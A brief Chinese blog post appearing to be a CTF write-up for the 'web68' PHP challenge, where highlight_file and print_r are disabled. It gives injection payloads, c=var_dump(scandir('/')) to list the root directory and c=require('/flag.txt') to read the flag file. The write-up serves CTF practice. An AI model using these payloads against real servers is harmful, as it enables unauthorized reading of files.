web68笔记(+禁用print_r、highlight)

web68 打开就直接说

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

 猜跟之前代码一致,加了过滤

然后这⾥还把print_r给禁了,⽤var_dump()吧

c=var_dump(scandir("/"));

还是在跟⽬录 flag.txt 既然highlight不让⽤,那就换别的

c=require("/flag.txt");

 

posted @ 2025-03-15 16:28  justdoIT*  阅读(7)  评论(0)    收藏  举报